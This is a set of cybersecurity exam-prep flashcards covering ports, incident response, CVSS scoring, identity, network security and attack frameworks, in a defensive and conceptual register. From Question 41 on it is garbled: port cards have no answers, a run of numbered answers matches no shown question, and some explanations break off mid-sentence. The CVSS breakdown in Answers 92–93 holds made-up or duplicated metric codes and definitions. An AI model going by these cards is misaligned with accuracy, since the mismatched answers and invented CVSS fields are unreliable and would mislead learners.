Assessment 1 Flashcards

Question 1

Q

After running an nmap scan of a system, you receive scan data that indicates the following three ports are open:
22/TCP
443/TCP
1521/TCP
What services commonly run on these ports?
A. SMTP, NetBIOS, MS-SQL
B. SSH, LDAPS, LDAP
C. SSH, HTTPS, Oracle
D. FTP, HTTPS, MS-SQL

Answer

A

C. These three TCP ports are associated with
SSH (22),
HTTPS (443),
Oracle databases (1521).

Other ports mentioned in the potential answers are SMTP (25), NetBIOS (137–139),
LDAP (389), LDAPS (636) and MS-SQL (1433/1434)

Question 2

Q

What type of system allows attackers to believe they have succeeded with their attack, thus providing defenders with information about their attack methods and tools?
A. A honeypot
B. A sinkhole
C. A crackpot
D. A darknet

Answer

A

A. Honeypots are systems that are designed to look like attractive targets. When they
are attacked, they simulate a compromise, providing defenders with a chance to see how attackers operate and what tools they use. DNS sinkholes provide false information to malicious software, redirecting queries about command-and-control (C&C) systems to
allow remediation. Darknets are segments of unused network space that are monitored to detect traffic—since legitimate traffic should never be aimed at the darknet, this can be used to detect attacks and other unwanted traffic. Crackpots are eccentric people—not a system
you’ll run into on a network.

Question 3

Q

What cybersecurity objective could be achieved by running your organization’s web servers in redundant, geographically separate datacenters?
A. Confidentiality
B. Integrity
C. Immutability
D. Availability

Answer

A

D. Redundant systems, particularly when run in multiple locations and with other protections to ensure uptime, can help provide availability.

Question 4

Q

Which of the following vulnerability scanning methods will provide the most accurate detail
during a scan?
A. Black box/unknown environment
B. Authenticated
C. Internal view
D. External view

Answer

A

B. An authenticated, or credentialed, scan provides the most detailed view of the system. Black-box assessments presume no knowledge of a system and would not have credentials or an agent to work with on the system. Internal views typically provide more detail than external views, but neither provides the same level of detail that credentials can allow. To learn more on this topic, see Chapter 6.

Question 5

Q

Security researchers recently discovered a flaw in the Chakra JavaScript scripting engine in Microsoft’s Edge browser that could allow remote execution or denial of service via a specifically crafted website. The CVSS 3.1 score for this vulnerability reads:
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
What is the attack vector and the impact to integrity based on this rating?
A. System, 9, 8
B. Browser, High
C. Network, High
D. None, High

Answer

A

C. When reading the CVSS score, AV is the attack vector. Here, N means network. Confidentiality (C), integrity (I), and availability (A) are listed at the end of the listing, and all three are rated as High in this CVSS rating. To learn more on this topic, see Chapter 7.

Question 6

Q

Alice is a security engineer tasked with performing vulnerability scans for her organization. She encounters a false positive error in one of her scans. What should she do about this?
A. Verify that it is a false positive, and then document the exception.
B. Implement a workaround.
C. Update the vulnerability scanner.
D. Use an authenticated scan, and then document the vulnerability

Answer

A

A. When Alice encounters a false positive error in her scans, her first action should be to verify it. This may involve running a more in-depth scan like an authenticated scan, but it could also involve getting assistance from system administrators, checking documentation, or other validation actions. Once she is done, she should document the exception so that it is properly tracked. Implementing a workaround is not necessary for false positive vulnerabilities, and updating the scanner should be done before every vulnerability scan. Using an
authenticated scan might help but does not cover all the possibilities for validation she may
need to use. To learn more on this topic, see Chapter 7.

Question 7

Q

Which phase of the incident response process is most likely to include gathering additional evidence such as information that would support legal action?
A. Preparation
B. Detection and Analysis
C. Containment, Eradication, and Recovery
D. Post-incident Activity and Reporting

Answer

A

C. The Containment, Eradication, and Recovery phase of an incident includes steps to limit damage and document what occurred, including potentially identifying the attacker and tools used for the attack. This means that information useful to legal actions is most likely to be gathered during this phase. To learn more on this topic, see Chapter 9.

Question 8

Q

Which of the following descriptions explains an integrity loss?
A. Systems were taken offline, resulting in a loss of business income.
B. Sensitive or proprietary information was changed or deleted.
C. Protected information was accessed or exfiltrated.
D. Sensitive personally identifiable information was accessed or exfiltrated.

Answer

A

B. Integrity breaches involve data being modified or deleted. Systems being taken offline is an availability issue, protected information being accessed might be classified as a breach of proprietary information, and sensitive personally identifiable information breaches would typically be classified as privacy breaches

Question 9

Q

Hui’s incident response program uses metrics to determine if their subscription to and use of IoC feeds is meeting the organization’s requirements. Which of the following incident response metrics is most useful if Hui wants to assess their use of IoC feeds?
A. Alert volume metrics
B. Mean time to respond metrics
C. Mean time to detect metrics
D. Mean time to remediate metrics

Answer

A

C. IoCs are used to improve detection, and Hui knows that gathering mean time to detect metrics will help the organization determine if their use of IoC feeds is improving detection speed. Alert volume is driven by configuration and maintenance of alerts, and it would not determine if the IoC usage was appropriate. Response time and remediation time are better used to measure the organization’s processes and procedures.

Question 10

Q

Abdul’s monitoring detects regular traffic sent from a system that is suspected to be compromised and participating in a botnet to a set of remote IP addresses. What is this called?
A. Anomalous pings
B. Probing
C. Zombie chatter
D. Beaconing

Answer

A

D. Regular traffic from compromised systems to command-and-control nodes is known as beaconing. Anomalous pings could describe unexpected pings, but they are not typically part of botnet behavior, zombie chatter is a made-up term, and probing is part of scanning behavior in some cases. To learn more on this topic, see

Question 11

Q

What industry standard is used to describe risk scores?
A. CRS
B. CVE
C. RSS
D. CVSS

Answer

A

D. The Common Vulnerability Scoring System, or CVSS, is used to rate and describe risks. CVE, Common Vulnerabilities and Exposures, classifies vulnerabilities. RSS, or Really Simple Syndication, is used to create feeds of websites. CRS was made up for this question. To learn
more on this topic, see Chapter 12.

Question 12

Q

What term is used to describe the retention of data and information related to pending or active litigation?
A. Preservation
B. Legal hold
C. Criminal hold
D. Forensic archiving

Answer

A

B. The term legal hold is used to describe the retention of data and information related to a pending or active legal investigation. Preservation is a broader term used to describe retention of data for any of a variety of reasons including business requirements. Criminal
hold and forensic archiving were made up for this question. To learn more on this topic, see
Chapter 13

Question 13

Q

During a forensic investigation Maria discovers evidence that a crime has been committed.
What do organizations typically do to ensure that law enforcement can use data to prosecute
a crime?
A. Securely wipe drives to prevent further issues
B. Document a chain of custody for the forensic data
C. Only perform forensic investigation on the original storage media
D. Immediately implement a legal hold

Answer

A

B. Documenting a proper chain of custody will allow law enforcement to be more likely to use forensic data successfully in court. Wiping drives will cause data loss, forensic examination is done on copies, not original drives, and legal holds are done to preserve data when litigation is occurring or may occur

Question 14

Q

Oscar’s manager has asked him to ensure that a compromised system has been completely purged of the compromise. What is Oscar’s best course of action?
A. Use an antivirus tool to remove any associated malware.
B. Use an antimalware tool to completely scan and clean the system.
C. Wipe and rebuild the system.
D. Restore a recent backup.

Answer

A

C. The most foolproof means of ensuring that a system does not remain compromised is to wipe and rebuild it. Without full knowledge of when the compromise occurred, restoring a
backup may not help, and both antimalware and antivirus software packages cannot always ensure that no remnant of the compromise remains, particularly if the attacker created accounts or otherwise made changes that wouldn’t be detected as malicious software. To
learn more on this topic, see Chapter 11.

Question 15

Q

Which of the following actions is not a common activity during the recovery phase of an incident response process?
A. Reviewing accounts and adding new privileges
B. Validating that only authorized user accounts are on the systems
C. Verifying that all systems are logging properly
D. Performing vulnerability scans of all systems

Answer

A

A. The recovery phase does not typically seek to add new privileges. Validating that only legitimate accounts exist, that the systems are all logging properly, and that systems have been vulnerability scanned are all common parts of an incident response recovery phase.
To learn more on this topic, see Chapter 11.

Question 16

Q

A statement like “Windows workstations must have the current security configuration template applied to them before being deployed” is most likely to be part of which document?
A. Policies
B. Standards
C. Procedures
D. Guidelines

Answer

A

B. This statement is most likely to be part of a standard. Policies contain high-level statements of management intent; standards provide mandatory requirements for how policies are carried out, including statements like that provided in the question. A procedure would
include the step-by-step process, and a guideline describes a best practice or recommendation.
To learn more on this topic, see Chapter 8

Question 17

Q

A firewall is an example of what type of control?
A. Preventive
B. Detective
C. Responsive
D. Corrective

Answer

A

A. The main purpose of a firewall is to block malicious traffic before it enters a network,
therefore preventing a security incident from occurring. For this reason, it is best classified as a preventive control. To learn more on this topic, see Chapter 8.

Question 18

Q

Cathy wants to collect network-based indicators of compromise as part of her security monitoring practice. Which of the following is not a common network-related IoC?
A. Bandwidth consumption
B. Rogue devices on the network
C. Scheduled updates
D. Activity on unexpected ports

Answer

A

C. Scheduled updates are a normal activity on network connected devices. Common indicators of potentially malicious activity include bandwidth consumption, beaconing, irregular peer-to-peer communication, rogue devices, scans, unusual traffic spikes, and activity on
unexpected ports. To learn more on this topic, see Chapter 3.

Question 19

Q

Nick wants to analyze a potentially malicious software package using an open source, locally hosted tool. Which of the following tools is best suited to his need if he wants to run the tool as part of the process?
A. Strings
B. A SIEM
C. VirusTotal
D. Cuckoo Sandbox

Answer

A

D. Cuckoo Sandbox is the only item from the list of potential answers that is a locally
installed and run sandbox that analyzes potential malware by running it in a safe sandbox
environment. To learn more on this topic, see Chapter 3.

Question 20

Q

Which software development life cycle model uses linear development concepts in an iterative, four-phase process?
A. Waterfall
B. Agile
C. RAD
D. Spiral

Answer

A

D. The Spiral model uses linear development concepts like those used in Waterfall but repeats four phases through its life cycle: requirements gathering, design, build, and evaluation. To learn more on this topic

Question 21

Q

Naomi wants to make her applications portable and easy to move to new environments without the overhead of a full operating system. What type of solution should she select?
A. An x86 architecture
B. Virtualization
C. Containerization
D. A SASE solution

Answer

A

C. Naomi should containerize her application. This will provide her with a lightweight option that can be moved between services and environments without requiring her to have
an OS included in her container. Virtualization would include a full operating system. SASE is a solution for edge-focused security, whereas x86 is a hardware architecture.

Question 22

Q

Bharath wants to make changes to the Windows Registry. What tool should he select?
A. regwiz.msc
B. notepad.exe
C. secpol.msc
D. regedit

Answer

A

D. The built-in Windows Registry editor is regedit. The secpol.msc tool is used to view
and manage security policies. There is no regwiz tool, and Notepad, while handy, shouldn’t be used to try to edit the Registry!

Question 23

Q

Tom wants to set an appropriate logging level for his Cisco networking equipment while he’s troubleshooting. What log level should he set?
A. 1
B. 3
C. 5
D. 7

Answer

A

D. Tom knows that log level 7 provides debugging messages that he will need during troubleshooting. Once he’s done, he’ll likely want to set a lower log level to ensure that he doesn’t
create lots of noise in his logs.

Question 24

Q

Which of the following is not a common use of network segmentation?
A. Decreasing attack surfaces
B. Limiting the scope of regulatory compliance
C. Reducing availability
D. Increasing the efficiency of a network

Answer

A

C. Segmentation is sometimes used to increase availability by reducing the potential impact of an attack or issue—intentionally reducing availability is unlikely to be a path chosen by most organizations.

Question 25

Q

Ric’s organization wants to implement zero trust. What concern should Ric raise about zero trust implementations?
A. They can be complex to implement.
B. Zero trust does not support TLS inspection.
C. Zero trust is not compatible with modern software-defined networks.
D. They are likely to prevent users from accomplishing their jobs

Answer

A

A. Ric knows that zero trust can be complex to implement. Zero trust does not specifically prevent TLS inspection or conflict with SDN, and a successful zero trust implementation
needs to validate user permissions but allow them to do their jobs.

Question 26

Q

Michelle has a security token that her company issues to her. What type of authentication
factor does she have?
A. Biometric
B. Possession
C. Knowledge
D. Inherence

Answer

A

B. Michelle’s security token is an example of a possession factor, or “something you have.” A
password or PIN would be a knowledge factor or “something you know,” and a fingerprint
or retina scan would be a biometric, or inherence, factor.

Question 27

Q

Which party in a federated identity service model makes assertions about identities to service
providers?
A. RPs
B. CDUs
C. IDPs
D. APs

Answer

A

C. Identity providers (IDPs) make assertions about identities to relying parties and service
providers in a federation. CDUs and APs are not terms used in federated identity designs.

Question 28

Q

What design concept requires that each action requested be verified and validated before it is allowed to occur?
A. Secure access service edge
B. Zero trust
C. Trust but verify
D. Extended validation network

Answer

A

B. Zero trust requires each action or use of privileges to be validated and verified before it is allowed to occur. Secure access service edge combines software-defined networking with other security products and services to control edge device security rather than requiring a secured central service or network. Trust but verify and extended validation network are not
design concepts

Question 29

Q

Juan’s organization uses LDAP to allow users to log into a variety of services without having to type in their username and password again. What type of service is in use?
A. SSO
B. MFA
C. EDR
D. ZeroAuth

Answer

A

A. Juan’s organization is using a single sign-on (SSO) solution that allows users to sign in
once and use multiple services. MFA is multifactor authentication; EDR is endpoint detection and response, an endpoint security tool; and ZeroAuth was made up for this question.

Question 30

Q

Jen’s organization wants to ensure that administrator credentials are not used improperly.
What type of solution should Jen recommend to address this requirement?
A. SAML
B. CASB
C. PAM
D. PKI

Answer

A

C. A privilege access management (PAM) system would not only allow Jen’s organization to manage and monitor privilege use for administrator accounts but would be helpful for other privileges as well. SAML is an XML-based language used to send authorization and authentication data, a CASB is a cloud access security broker used to manage cloud access rights, and
PKI is a public key infrastructure used to issue and manage security certificates.

Question 31

Q

Financial and medical records are an example of what type of data?
A. CHD
B. PCI
C. PII
D. TS/SCI

Answer

A

C. Common examples of PII include financial records, addresses and phone numbers, and national or state identification numbers like Social Security numbers, passport numbers, and
driver’s license numbers in the United States. CHD is cardholder data. PCI is the payment card industry, which defines the PCI DSS security standard. TS/SCI is a U.S. classification label standing for Top Secret/Sensitive Compartmented Information

Question 32

Q

Which of the following is not part of cardholder data for credit cards?
A. The cardholder’s name
B. The CVV code
C. The expiration date
D. The primary account number

Answer

A

B. The primary account number (PAN), the cardholder’s name, and the expiration date of the card are considered cardholder data. Sensitive authentication data includes the CVV code, the contents of the magnetic stripe and chip, and the PIN code if one is used.

Question 33

Q

Sally wants to find configuration files for a Windows system. Which of the following is not a common configuration file location?
A. The Windows Registry
B. C:\Program Files\
C. directory:\Windows\Temp
D. C:\ProgramData\

Answer

A

C. The temporary files directory is not a common location for configuration files for programs. Instead, the Registry, ProgramData, and Program Data directories are commonly
used to store configuration information.

Question 34

Q

What type of factor is a PIN?
A. A location factor
B. A biometric factor
C. A possession factor
D. A knowledge factor

Answer

A

D. A PIN is something you know and thus is a knowledge factor.

Question 35

Q

What protocol is used to ensure that logs are time synchronized?
A. TTP
B. NTP
C. SAML
D. FTP

Answer

A

B. NTP (Network Time Protocol) is the underlying protocol used to ensure that systems are using synchronized time.

Question 36

Q

OAuth, OpenID, SAML, and AD FS are all examples of what type of technology?
A. Federation
B. Multifactor authentication
C. Identity vetting
D. PKI

Answer

A

A. OAuth, OpenID, SAML, and AD FS are all examples of technologies used for federated identity. They aren’t MFA, identity vetting, or PKI technologies.

Question 37

Q

Example Corporation has split their network into network zones that include sales, HR, research and development, and guest networks, each separated from the others using network security devices. What concept is Example Corporation using for their network security?
A. Segmentation
B. Software-defined networking
C. Single-point-of-failure avoidance
D. Zoned routing

Answer

A

A. Example Corporation is using segmentation, separating different risk or functional groupings. Software-defined networking is not mentioned, as no code-based changes or configurations are being made. There is nothing to indicate a single point of failure, and zoned routing
was made up for this question—but the zone routing protocol is a network protocol used to maintain routes in a local network region.

Question 38

Q

During a penetration test of Anna’s company, the penetration testers were able to compromise the company’s web servers and deleted their log files, preventing analysis of their attacks. What compensating control is best suited to prevent this issue in the future?
A. Using full-disk encryption
B. Using log rotation
C. Sending logs to a syslog server
D. Using TLS to protect traffic

Answer

A

C. Sending logs to a remote log server or bastion host is an appropriate compensating control. This ensures that copies of the logs exist in a secure location, allowing them to be reviewed if a similar compromise occurred. Full-disk encryption leaves files decrypted while in use and would not secure the log files from a compromise, whereas log rotation simply
means that logs get changed out when they hit a specific size or time frame. TLS encryption for data (including logs) in transit can keep it private and prevent modification but wouldn’t protect the logs from being deleted.

Question 39

Q

Ben is preparing a system hardening procedure for his organization. Which of the following is not a typical system hardening process or step?
A. Updating and patching systems
B. Enabling additional services
C. Enabling logging
D. Configuration disk encryption

Answer

A

B. Ben knows that hardening processes typically focus on disabling unnecessary services, not enabling additional services. Updating, patching, enabling logging, and configuring security capabilities like disk encryption are all common hardening practices.

Question 40

Q

Gabby is designing a multifactor authentication system for her company. She has decided to use a passphrase, a time-based code generator, and a PIN to provide additional security.
How many distinct factors will she have implemented when she is done?
A. One
B. Two
C. Three
D. Four

Answer

A

B. While it may seem like Gabby has implemented three different factors, both a PIN and a passphrase are knowledge-based factors and cannot be considered distinct factors. She has implemented two distinct factors with her design. If she wanted to add a third factor, she could replace either the password or the PIN with a fingerprint scan or other biometric fact

Question 41

Q

ports 20, 21

Question 42

Q

22

Question 43

Q

23

Question 44

Q

25

Question 45

Q

53

Question 46

Q

80

Question 47

Q

110

Question 48

Q

123

Question 49

Q

143

Question 50

Q

389

Question 51

Q

443

Question 52

Q

636

Question 53

Q

1433

Answer

A

SQL SERVER

Question 54

Q

1521

Question 55

Q

1723

Question 56

Q

3389

Question 57

Q

During an incident response, you find that an employee’s workstation was infected with ransomware. What should be the first step in the incident response process?

A. Erase the affected workstation’s hard drive.
B. Isolate the affected workstation from the network.
C. Reinstall the operating system.
D. Notify all employees about the ransomware attack.

Answer

A

B. Isolate the affected workstation from the network.

Question 58

Q

What type of vulnerability scan focuses on identifying misconfigurations and weak security settings in a network?

A. External scan
B. Internal scan
C. Baseline scan
D. Full scan

Answer

A

B. Internal scan

Question 59

Q

Which log source is most likely to provide information about unauthorized access attempts to a network resource?

A. Application logs
B. Web server logs
C. System logs
D. Network device logs

Answer

A

D. Network device logs

Question 60

Q

A company is assessing the likelihood and impact of potential security threats. What process are they engaged in?

A. Risk assessment
B. Vulnerability scanning
C. Penetration testing
D. Threat hunting

Answer

A

A. Risk assessment

Question 61

Q

Which type of tool would you use to continuously monitor network traffic and provide alerts on suspicious activities?

A. IDS (Intrusion Detection System)
B. SIEM (Security Information and Event Management)
C. HIPS (Host-based Intrusion Prevention System)
D. DLP (Data Loss Prevention)

Answer

A

A. IDS (Intrusion Detection System)

Question 62

Q

What is the primary purpose of implementing access control lists (ACLs) in a network?

A. To encrypt sensitive data in transit
B. To control which users and devices can access network resources
C. To monitor network traffic for anomalies
D. To patch known vulnerabilities in network devices

Answer

A

B. To control which users and devices can access network resources

Question 63

Q

After analyzing a security incident, you find that an attacker exploited a vulnerability in an outdated software version. What should be done to mitigate this type of vulnerability in the future?

A. Install a firewall to block the attack.
B. Regularly update and patch software.
C. Disable the outdated software.
D. Use encryption to protect data.

Answer

A

B. Regularly update and patch software.

Question 64

Q

What is the purpose of the OSI model in networking?

A. To define the standard hardware interfaces
B. To standardize the protocols used for network communication
C. To provide a framework for understanding network interactions and protocols
D. To determine the speed and bandwidth of the network

Answer

A

C. To provide a framework for understanding network interactions and protocols

Answer 50

A

A. To segment network traffic into separate broadcast domains

Answer 51

A

B. To control access to network resources based on IP addresses and protocols

Answer 52

A

A. show ip route

Answer 53

A

B. Point-to-Point Protocol

Answer 54

A

B. To gather information about a target system to identify potential security weaknesses

Answer 55

A

A. Nessus

Answer 56

A

B. Password cracking

Answer 57

A

A. To capture and analyze network traffic

Answer 58

A

D. Pretexting

Answer 59

A

B. To ensure data integrity and verify the authenticity of the sender

Answer 60

A

Examples: Ethernet cables, fiber optics, and wireless radio frequencies.

Answer 61

A

Examples: MAC addresses, Ethernet, and switches.

Answer 62

A

Examples: IP addresses, routers.

Answer 63

A

Examples: TCP (Transmission Control Protocol), UDP (User Datagram Protocol).

Answer 64

A

Examples: Session establishment protocols, APIs.

Answer 65

A

Examples: Data formats, encryption protocols like SSL/TLS.

Answer 66

A

Examples: HTTP, FTP, SMTP, DNS.

Answer 67

A

Open Source Intelligence (OSINT) refers to the process of collecting and analyzing publicly available information to support decision-making, investigation, or analysis. This information can come from a wide range of sources, including:

Internet Resources: Websites, social media platforms, blogs, forums, and online news articles.
Public Records: Government databases, court records, and public filings.
Media: Newspapers, television, radio broadcasts, and other forms of media.
Academic and Research Publications: Journals, research papers, and other scholarly work.
Commercial Data: Market research reports, business directories, and industry reports.

Answer 68

A

Defensive OSINT is a proactive approach to security, aiming to stay ahead of potential threats by leveraging publicly available information to strengthen defenses and mitigate risks.
Here are some key aspects of defensive OSINT:

Threat Detection
Vulnerability Assessment
Reputation Management
Incident Response
Security Awareness

Answer 69

A

CERT stands for Computer Emergency Response Team. It’s a specialized group that provides expertise and support in managing and responding to cybersecurity incidents and threats. The key functions and roles of a CERT include:
Incident Response: Assisting organizations in identifying, managing, and mitigating cybersecurity incidents such as breaches, malware infections, and other types of cyberattacks. CERTs often provide guidance on how to contain and recover from these incidents.

Threat Intelligence: Gathering, analyzing, and disseminating information about current and emerging threats to help organizations understand and defend against potential risks. This can involve sharing information about vulnerabilities, attack patterns, and trends.

Security Advice and Best Practices: Offering recommendations and guidelines on improving cybersecurity practices and policies to help organizations strengthen their defenses and reduce the risk of incidents.

Coordination and Collaboration: Working with other CERTs, government agencies, law enforcement, and private sector organizations to coordinate responses to large-scale or complex incidents and to share information about threats and vulnerabilities.

Training and Awareness: Providing training and resources to help organizations and individuals understand cybersecurity risks and implement effective security measures. This can include workshops, seminars, and educational materials.

Research and Development: Conducting research to develop new tools, techniques, and methodologies for detecting, preventing, and responding to cyber threats.

Answer 70

A

a) NIST’s Cybersecurity Framework

The NIST Cybersecurity Framework provides a structured approach to managing and prioritizing cybersecurity risks based on the potential impact of threats. It includes components for identifying, protecting, detecting, responding to, and recovering from cybersecurity incidents, helping organizations focus on the most critical areas of their IT infrastructure.

Answer 71

A

b) Prioritizing the risk level associated with each vulnerability

Prioritizing vulnerabilities based on their risk level—considering factors like potential impact, exploitability, and the criticality of affected systems—is essential for effective management and mitigation. This approach helps ensure that resources are allocated to address the most significant threats first, reducing the overall risk to the organization.

Answer 72

A

d) Leading to postponed or overlooked system updates and patches

When a company is hesitant to disrupt its business processes, it might delay or skip necessary system updates and security patches to avoid interruptions. This can leave vulnerabilities unaddressed, increasing the risk of security breaches and compromising the overall effectiveness of its vulnerability management efforts.

Answer 73

A

c) Helps in identifying and prioritizing the system vulnerabilities

Regular vulnerability management reporting allows an organization to systematically identify and assess the security weaknesses in its systems. By continuously monitoring and reporting on vulnerabilities, the organization can prioritize them based on their risk levels, ensuring that the most critical issues are addressed promptly and effectively. This proactive approach helps in maintaining a robust security posture and mitigating potential threats.

Answer 74

A

b) nmap -O

The -O option in Nmap enables OS detection, which attempts to determine the operating system of the target system based on various network characteristics.

Answer 75

A

c) Mitigation

Mitigation involves taking steps to reduce the impact or likelihood of identified risks. By conducting weekly vulnerability scans and promptly patching any issues within 24 hours, Dion Training is actively working to reduce their security vulnerabilities and manage risk effectively.

Answer 76

A

To identify affected hosts in a system, you can use the following methods:

b) Use a vulnerability scanner to scan the system for known vulnerabilities.

c) Use a packet sniffer to monitor network traffic for signs of exploitation.

d) Use a network scanner to scan the network for hosts that are running vulnerable software.

Each of these methods helps in identifying hosts that may be vulnerable or compromised in different ways:

Vulnerability scanners look for known vulnerabilities in systems and applications.
Packet sniffers can detect signs of exploitation by analyzing network traffic.
Network scanners identify hosts on the network and can detect if they are running software with known vulnerabilities.
Bitlocker is not used for identifying affected hosts; it is a disk encryption feature designed to protect data on Windows systems.

Answer 77

A

Threat hunting in cybersecurity is a proactive approach to identifying and mitigating potential security threats within an organization’s network. Unlike traditional methods that rely on automated tools and reactive measures, threat hunting involves actively searching for signs of malicious activity or security breaches that may not be detected by standard defenses.

Here’s a breakdown of what threat hunting involves:

Proactive Searching: Threat hunters don’t wait for alerts from security systems. Instead, they actively search for anomalies and indicators of compromise (IOCs) that might suggest an attacker is present in the network.

Hypothesis-Driven: Hunters often start with a hypothesis about how an attack might occur or how a threat actor might behave. They use this hypothesis to guide their search for evidence.

Analysis of Data: They analyze data from various sources, such as network traffic, system logs, and endpoint activity, to identify patterns or behaviors indicative of a threat.

Use of Tools and Techniques: Threat hunters employ various tools, including advanced analytics, machine learning, and custom scripts, to detect hidden threats. They might also use threat intelligence feeds to stay updated on the latest attack techniques.

Collaboration: Threat hunting often involves collaboration with other teams, such as incident response and forensic teams, to validate findings and develop mitigation strategies.

Continuous Improvement: Findings from threat hunting activities are used to refine and improve the organization’s security posture, such as updating detection rules, improving response protocols, and enhancing overall defenses.

In essence, threat hunting aims to find and neutralize threats before they can cause significant damage, improving the organization’s overall security resilience.

Answer 78

A

A Cloud Access Security Broker (CASB) is a security solution designed to manage and secure access to cloud-based services and applications. CASBs act as an intermediary between users and cloud service providers, providing visibility, control, and protection for data and applications in the cloud. They help organizations enforce security policies and ensure compliance with regulations, addressing various concerns related to cloud usage.

Answer 79

A

Data Loss Prevention (DLP) is a cybersecurity technology used to prevent sensitive data from being accidentally or intentionally copied, transferred, or shared outside of an organization’s authorized boundaries. It helps protect against data breaches, regulatory violations, and financial losses.

Here are some common use cases for DLP:

Preventing data exfiltration: DLP can detect and block attempts to copy or transfer sensitive data to unauthorized locations, such as personal email accounts or external devices.
Enforcing compliance: DLP can help organizations comply with industry regulations like GDPR, HIPAA, and PCI DSS, which require strict data protection measures.
Protecting intellectual property: DLP can safeguard valuable intellectual property, such as trade secrets, research data, and customer information.
Preventing insider threats: DLP can detect and prevent malicious insiders from stealing or sharing sensitive data.
DLP solutions typically use a combination of techniques, including:

Content analysis: Examining the content of files and messages to identify sensitive data.
Context analysis: Analyzing the context in which data is accessed or transferred to determine if it is authorized.
User behavior analysis: Monitoring user behavior to detect suspicious activity.
Encryption: Encrypting sensitive data to make it unreadable if it is intercepted.
Access controls: Restricting access to sensitive data based on user roles and permissions.
By implementing effective DLP measures, organizations can significantly reduce the risk of data breaches and protect their valuable assets.

Answer 80

A

Multi-cloud security refers to the practice of protecting data and applications deployed across multiple cloud platforms (e.g., AWS, Azure, Google Cloud). As organizations increasingly adopt hybrid and multi-cloud strategies, ensuring security across these environments becomes paramount.

Answer 81

A

Security architecture is the design and implementation of a comprehensive security strategy for an organization’s IT infrastructure. It provides a blueprint for protecting information assets and ensuring compliance with security regulations.

Answer 82

A

Key components of security architecture include:

Security policies and standards: A set of guidelines and rules that define the organization’s security practices.
Security controls: Mechanisms used to protect information assets, such as firewalls, intrusion detection systems, encryption, and access controls.
Security frameworks: Standardized approaches to security management, such as NIST Cybersecurity Framework or ISO 27001.
Security risk management: The process of identifying, assessing, and mitigating security risks.
A well-designed security architecture should address the following goals:

Confidentiality: Ensuring that information remains private and accessible only to authorized individuals.
Integrity: Protecting information from unauthorized modification or deletion.
Availability: Ensuring that information is accessible when needed.
Non-repudiation: Preventing users from denying their actions or involvement in a transaction.
Common security architectures include:

Defense in depth: A layered approach to security that uses multiple controls to protect information assets.
Zero trust: A security model that assumes that all network traffic is untrusted and requires strong authentication and authorization before granting access.
Cloud security architecture: A specific type of architecture designed to protect cloud-based applications and data.
By developing a robust security architecture, organizations can improve their resilience to cyber threats and protect their valuable information assets.

Answer 83

A

Security Orchestration, Automation, and Response (SOAR) is a technology platform designed to streamline and improve security operations by automating repetitive tasks, integrating disparate security tools, and providing a centralized view of security events.
Key components of SOAR include:

Automation: Automating routine security tasks, such as threat intelligence gathering, vulnerability scanning, and incident response procedures.
Orchestration: Coordinating and integrating multiple security tools and processes to create a cohesive security response.
Response: Providing a platform for security analysts to investigate and respond to security incidents efficiently.

Answer 84

A

XSS (Cross-Site Scripting) is a type of web application vulnerability that allows an attacker to inject malicious scripts into a webpage that is viewed by other users. These scripts can be used to steal sensitive information, redirect users to malicious websites, or perform other malicious actions.

Answer 85

A

Reflected XSS: The malicious script is reflected back to the user’s browser in the response to a request.
Stored XSS: The malicious script is stored on the server and executed when a user visits a vulnerable page.
DOM-based XSS: The malicious script is executed within the Document Object Model (DOM) of the web page.

Answer 86

A

Cyber Kill Chain is a conceptual framework that outlines the various stages a cyberattack typically follows. It’s a helpful tool for understanding and defending against cyber threats. By understanding the Cyber Kill Chain, organizations can implement defensive measures at each stage to prevent or mitigate cyberattacks. For example, they can strengthen their network security, educate employees about phishing threats, and deploy intrusion detection systems.

Answer 87

A

1-Reconnaissance: The attacker gathers information about the target, such as its networks, systems, and vulnerabilities.
2-Weaponization: The attacker develops malicious payloads, such as malware or exploit code.
3-Delivery: The attacker delivers the malicious payload to the target, often through email, phishing, or social engineering.
4-Exploitation: The attacker exploits vulnerabilities in the target’s systems to gain unauthorized access.
5-Installation: The attacker installs malicious software on the target’s systems.
6-Command and Control: The attacker establishes a communication channel with the compromised systems to maintain control.
7-Actions on Objectives: The attacker carries out their intended actions, such as stealing data, disrupting operations, or causing damage.

Answer 88

A

Single Pane of Glass (SPOG) is a concept in IT management that refers to a centralized platform or dashboard that provides a unified view of an organization’s entire IT infrastructure. It allows administrators to monitor and manage various IT components, such as servers, networks, applications, and security systems, from a single interface.

Answer 89

A

Key benefits of SPOG:

Improved visibility: Provides a comprehensive overview of an organization’s IT environment, making it easier to identify potential issues and bottlenecks.
Enhanced efficiency: Streamlines IT operations by automating routine tasks and reducing manual effort.
Centralized management: Offers a centralized platform for managing and controlling IT resources.
Simplified troubleshooting: Facilitates troubleshooting by providing a single point of access to relevant information and tools.
Enhanced security: Improves security by providing a centralized view of potential threats and vulnerabilities.

Answer 90

A

CVSS (Common Vulnerability Scoring System) is a standardized framework used to measure the severity of software vulnerabilities. It assigns a numerical score to each vulnerability based on various factors, such as exploitability, impact, and the availability of a patch.

Answer 91

A

Key components of CVSS:

Base Score: The fundamental score that reflects the intrinsic characteristics of the vulnerability.
Temporal Score: Adjusts the base score based on factors like the availability of a patch or exploit.
Environmental Score: Adjusts the temporal score based on the specific environment in which the vulnerability exists.

Answer 92

A

Attack Vector: How the vulnerability can be exploited (e.g., network, local, remote).
Attack Complexity: The difficulty of exploiting the vulnerability.
Authentication: Whether authentication is required to exploit the vulnerability.
Privileges Required: The privileges necessary to exploit the vulnerability.
User Interaction: Whether user interaction is required to exploit the vulnerability.
Scope: Whether the vulnerability affects a single component or the entire system.
Confidentiality Impact: The potential impact on confidentiality (e.g., data disclosure).
Integrity Impact: The potential impact on integrity (e.g., data modification).
Availability Impact: The potential impact on availability (e.g., system downtime)

Answer 93

A

CVSS:3.1: Indicates the version of CVSS used.
AV:N: Attack Vector: Network
AC:L: Attack Complexity: Low
PR:N: Privileges Required: None
UI:R: User Interaction: Required
S:U: Scope: Unchanged
C:H: Confidentiality Impact: High
I:H: Integrity Impact: High
A:H: Availability Impact: High
E:P: Exploit Code Maturity: Proof-of-Concept
RC:X: Remediation Level: X (unknown)
RC:X: Report Confidence: X (unknown)
RL:D: Remediation Level: Defined
RU:U: Report Update: Unknown

Answer 94

A

IPS Event refers to an incident or occurrence detected by an Intrusion Prevention System (IPS). An IPS is a security device or software that monitors network traffic for malicious activity and takes action to prevent attacks from succeeding.

Answer 95

A

